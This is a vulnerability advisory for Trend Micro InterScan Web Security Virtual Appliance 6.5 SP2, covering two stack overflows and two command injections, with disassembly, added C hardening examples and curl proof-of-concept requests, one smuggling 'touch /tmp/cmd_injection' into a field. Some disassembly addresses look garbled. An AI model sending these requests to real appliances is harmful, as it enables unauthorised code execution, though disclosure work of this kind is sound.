Multiple vulnerabilities identified in Trend Micro InterScan Web Security Virtual Appliance 6.5 Service Pack 2
CVE-2020-28578: Unauthenticated remote stack buffer overflow
Function Java_com_trend_iwss_gui_IWSJNI_DecryptPasswd in libuauit
.text:0001EC00 Java_com_trend_iwss_gui_IWSJNI_DecryptPasswd proc near
.text:0001EC00 var_4 = dword ptr -4
.text:0001EC00 sub esp, 42Ch
.text:0001EC06 mov [esp+42Ch+var_C], esi
.text:0001EC0D mov esi, [esp+42Ch+arg_jniEnv]
.text:0001EC14 mov edx, [esp+42Ch+arg_jstringPassword] ; attacker-controlled
.text:0001EC1B mov [esp+42Ch+var_10], ebx
.text:0001EC22 mov [esp+42Ch+var_8], edi
.text:0001EC29 lea edi, [esp+42Ch+var_41C]
.text:0001EC2D mov [esp+42Ch+var_4], ebp
.text:0001EC34 mov eax, [esi]
.text:0001EC36 call sub_1978D
.text:0001EC3B add ebx, 60FA9h
.text:0001EC41 mov [esp+42Ch+src], edx
.text:0001EC45 mov [esp+42Ch+var_424], 0
.text:0001EC4D mov [esp+42Ch+dest], esi
.text:0001EC50 ; convert jstring to char*
.text:0001EC50 call [eax+JNIEnv.GetStringUTFChars]
.text:0001EC56 mov [esp+42Ch+dest], edi ; fixed-size stack buffer -> stack overflow
.text:0001EC59 mov [esp+42Ch+src], eax ; attacker-controlled
.text:0001EC5D mov ebp, eax
.text:0001EC5F call _strcpy
Proof of concept
An unauthenticated remote attacker can exploit the vulnerability by sending a specially crafted HTTP message to the URL /rest/windows_client_status:
curl -ski -d 'id=localhost&basy=true&encry=false&password=$' https://:8443/rest/windows_client_status
An attacker could achieve remote code execution.
CVE-2020-28579: Authenticated remote stack buffer overflow
A flaw exists in the mail-notification function of ibuiauitil.so.
.text:00048950 mail_notification proc near ; DATA XREF: .got.plt:off_803F8
.text:00048950 buf = dword ptr -564Ch
.text:00048950 c = dword ptr -5648h
.text:00048950 n = dword ptr -5644h
.text:00048950 var_5634 = dword ptr -5634h
.text:00048950 var_5630 = dword ptr -5630h
.text:00048950 var_562C = byte ptr -562Ch
.text:00048950 var_542C = byte ptr -542Ch
.text:00048950 var_502C = byte ptr -502Ch
.text:00048950 dest = byte ptr -3C2Ch
.text:00048950 var_282C = dword ptr -282Ch
.text:00048950 var_2828 = byte ptr -2828h
.text:00048950 var_1428 = dword ptr -1428h
.text:00048950 var_1424 = byte ptr -1424h
.text:00048950 arg_mail_queue_path = dword ptr 4
.text:00048950 arg_sender_addr = dword ptr 8
.text:00048950 arg_trendlab_addr = dword ptr 0Ch
.text:00048950 arg_mailsubject = dword ptr 10h
.text:00048950 arg_bodymsg = dword ptr 14h
.text:00048950 push edi
.text:00048952 push esi
.text:00048953 push ebx
.text:00048954 call sub_1978D
.text:00048959 add ebx, 3728Bh
.text:0004895F sub esp, 563Ch
.text:00048965 lea eax, [esp+564Ch+dest]
.text:0004896C mov [esp+564Ch+var_542C], ...
.text:0004897B mov [esp+564Ch+buf], ...
.text:00048986 call _memset
.text:0004898B mov eax, ... ; attacker-controlled src data
.text:00048996 lea eax, [esp+564Ch+dest]
.text:0004899D mov [esp+564Ch+buf], eax ; fixed-size stack buffer -> stack overflow
.text:000489A0 call _strcat
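The copy in both listings (strcpy in DecryptPasswd, strcat in mail_notification) writes an attacker-controlled string into a fixed-size stack buffer with no bound. As an added illustration, not code from the advisory or from Trend Micro, the C below models that pattern next to a bounded replacement; the 1024-byte buffer size, the function names and the -1 error convention are assumptions.

```c
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 1024  /* assumed fixed stack buffer size (cf. var_41C / dest above) */
/* Bounded length: scans at most cap bytes, so it never runs past a buffer. */
static size_t bounded_len(const char *s, size_t cap) {
    size_t n = 0;
    while (n < cap && s[n] != '\0') n++;
    return n;
}

/* Vulnerable pattern from the listings: unbounded strcpy into a fixed stack buffer. */
int decrypt_passwd_unsafe(const char *password) {
    char buf[BUF_SIZE];
    strcpy(buf, password);                 /* no length check -> stack overflow */
    return (int)strlen(buf);
}

/* Hardened form: reject input that cannot fit with its NUL; returns length or -1. */
int decrypt_passwd_safe(const char *password, char *out, size_t out_len) {
    if (password == NULL || out == NULL || out_len == 0) return -1;
    size_t n = bounded_len(password, out_len);
    if (n >= out_len) return -1;           /* too long: reject before any copy */
    memcpy(out, password, n);
    out[n] = '\0';
    return (int)n;
}

/* strcat pattern from mail_notification, bounded by what dst already holds. */
int append_safe(char *dst, size_t dst_len, const char *src) {
    size_t used = bounded_len(dst, dst_len);
    if (used >= dst_len) return -1;        /* dst is not NUL-terminated */
    size_t room = dst_len - used - 1;
    size_t n = bounded_len(src, room + 1);
    if (n > room) return -1;               /* would overflow dst */
    memcpy(dst + used, src, n);
    dst[used + n] = '\0';
    return (int)(used + n);
}

/* Demo helper: hardened copy of a constructed input made of len 'A' bytes. */
int try_copy_len(size_t len) {
    char buf[BUF_SIZE], *input = malloc(len + 1);
    if (input == NULL) return -2;
    memset(input, 'A', len);
    input[len] = '\0';
    int r = decrypt_passwd_safe(input, buf, sizeof buf);
    free(input);
    return r;
}
```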
Proof of concept
An authenticated remote attacker can exploit the vulnerability by sending a specially crafted HTTP message to the URL /urlf_rescripiturl.jsp on HTTP port 8443:
a) Log in with a low-privileged Reports user account:
curl -ski -d '...Pwd=Log+On' https://:8443/logonsubmit.jsp

HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html;charset=UTF-8
Date: Fri, 24 Jul 2020 20:14:44 GMT
Location: https://:8443/index.jsp?CSRFGuardToken=55MYNQKMBK8KC3EB9TXC3FKOQH372OGX&summary_scan
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B3C8680FE9EEE804422FD8813D58496A; Path=/; Secure; HttpOnly

b) Attack with valid credentials and CSRFGuardToken:
curl -ski --cookie 'JSESSIONID=B3C8680FE9EEE804422FD8813D58496A' -d 'action=send&url=MyUrl&sender_note=MySendnote&mailsubject=MyMailSubject&sender_addr=$' https://:8443/urlf_rescripiturl.jsp?CSRFGuardToken=55MYNQKMBK8KC3EB9TXC3FKOQH372OGX
CVE-2020-28580:
Java_com_trend_iwss_gui_IWSJNI_AddVLAN
.text:00020620 lea eax, ... ; "/usr/iws/AdminUI/ui_ctl.sh"
.text:00020626 mov [esp+24Ch+param4], eax
.text:0002062A lea eax, ... ; format string "add VLAN item %s"
.text:00020630 mov [esp+24Ch+param1], edx
.text:00020633 mov ... ; attacker-controlled string
.text:00020637 mov ... ; format
.text:0002063B mov [esp+24Ch+param2], ... ; max
.text:0002064C lea eax, ... ; char*
.text:002065 call system_with_fd_close
Proof of concept
An authenticated remote attacker can exploit the vulnerability by sending a specially crafted HTTP message to the URL /servlet/com.trend.iwss.gui.servlet.ManageVLANSettings:
a) Log in with a high-privileged account:
curl -ski -d '...Pwd=Log+On' https://:8443/logonsubmit.jsp

HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html;charset=UTF-8
Date: Sat, 25 Jul 2020 01:32:57 GMT
Location: https://:8443/index.jsp?CSRFGuardToken=J4GIIPQZUU8896UP9P566UHSU54O30UX&summary_scan
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E96E748E079915805B771A2F1E38D63E; Path=/; Secure; HttpOnly

b) Attack with valid credentials and CSRFGuardToken:
curl -ski --cookie 'JSESSIONID=E96E748E079915805B771A2F1E38D63E' -d 'CSRFGuardToken=J4GIIPQZUU8896UP9P566UHSU54O30UX&action=...&ip=MyIp&submask=MySubMask&port=MyPort&id=...' https://:8443/servlet/com.trend.iwss.gui.servlet.ManageVLANSettings
CVE-2020-28581:
Java_com_trend_iwss_gui_IWSJNI_modififyVLAN
.text:0002088D ... eax, [esp+24Ch+220]
.text:00020891 lea eax, ... ; attacker-controlled string
.text:0002089? mov [esp+24Ch+param2], ... ; max
.text:000208A4 mov [esp+24Ch+param6], eax
.text:000208A8 lea eax, (setvlanitem - 7FBE4h)[ebx] ; format string "setVLAN... %s %d"
.text:000208B8 call _snprintf
.text:000208C5 lea eax, ... ; char*
.text:00208C call system_with_fd_close
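Both VLAN functions (AddVLAN and modifyVLAN above) format request fields into a shell command line with snprintf and hand it to system_with_fd_close, so a field containing shell metacharacters becomes part of the executed command. As an added example, not advisory or product code, the C below shows that string-building pattern beside a version that validates each field against a strict grammar and builds an argv array instead of a shell line; the script path, the verb, the field grammars and the function names are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern from the listings: request fields are formatted straight
 * into a shell command line, so "MyId;touch /tmp/x" becomes part of the command. */
int build_vlan_cmd_unsafe(char *cmd, size_t n, const char *ip, const char *id) {
    return snprintf(cmd, n, "/usr/iws/AdminUI/ui_ctl.sh addVLANitem %s %s", ip, id);
}

/* Strict IPv4 dotted quad: exactly four decimal octets, each 0..255. */
int valid_ipv4(const char *s) {
    int octets = 0;
    while (*s != '\0') {
        long v = 0; int digits = 0;
        while (isdigit((unsigned char)*s)) {
            v = v * 10 + (*s++ - '0');
            if (++digits > 3) return 0;
        }
        if (digits == 0 || v > 255) return 0;
        octets++;
        if (*s == '.') {                      /* separator must be followed by more */
            s++;
            if (*s == '\0') return 0;
        } else if (*s != '\0') return 0;      /* any other byte (';', ' ', '|') */
    }
    return octets == 4;
}

/* Identifier fields: short alphanumeric/underscore token only, so shell
 * metacharacters and whitespace never reach a command line. */
int valid_token(const char *s, size_t max_len) {
    size_t n = strlen(s);
    if (n == 0 || n > max_len) return 0;
    for (size_t i = 0; i < n; i++)
        if (!isalnum((unsigned char)s[i]) && s[i] != '_') return 0;
    return 1;
}
/* Hardened form: validate every field, then build an argv array for an
 * exec-style call instead of a shell string. Returns argc, or -1 if rejected. */
int build_vlan_argv_safe(const char *argv[5], const char *ip, const char *id) {
    if (!valid_ipv4(ip) || !valid_token(id, 32)) return -1;
    argv[0] = "/usr/iws/AdminUI/ui_ctl.sh";    /* assumed script path */
    argv[1] = "addVLANitem";
    argv[2] = ip;
    argv[3] = id;
    argv[4] = NULL;                            /* no shell parses these fields */
    return 4;
}
```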
Proof of concept
An authenticated remote attacker can exploit the vulnerability by sending a specially crafted HTTP message to the URL /servlet/com.trend.iwss.gui.servlet.ManageVLANSettings:
a) Log in with a high-privileged account:
curl -ski -d '...Pwd=Log+On' https://:8443/logonsubmit.jsp

HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html;charset=UTF-8
Date: Sat, 25 Jul 2020 03:37:45 GMT
Location: https://:8443/index.jsp?CSRFGuardToken=K26DCQZV520QQRB7PXU1ZLEL9RB1KRT8&summary_scan
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2867F790DE0F3B0445967CDEF6D9F609; Path=/; Secure; HttpOnly

b) Attack with valid credentials and CSRFGuardToken:
curl -ski --cookie 'JSESSIONID=2867F790DE0F3B0445967CDEF6D9F609' -d 'CSRFGuardToken=K26DCQZV520QQRB7PXU1ZLEL9RB1KRT8&action=modify&oldip=MyOldIp&oldsubmask=MyOldSubMask&oldport=MyOldPort&oldid=MyOldId&ip=MyIp&submask=MySubMask&port=MyPort&id=MyId;touch /tmp/cmd_injection' https://:8443/servlet/com.trend.iwss.gui.servlet.ManageVLANSettings
The attacker can execute arbitrary OS commands with the privileges of the iscan account.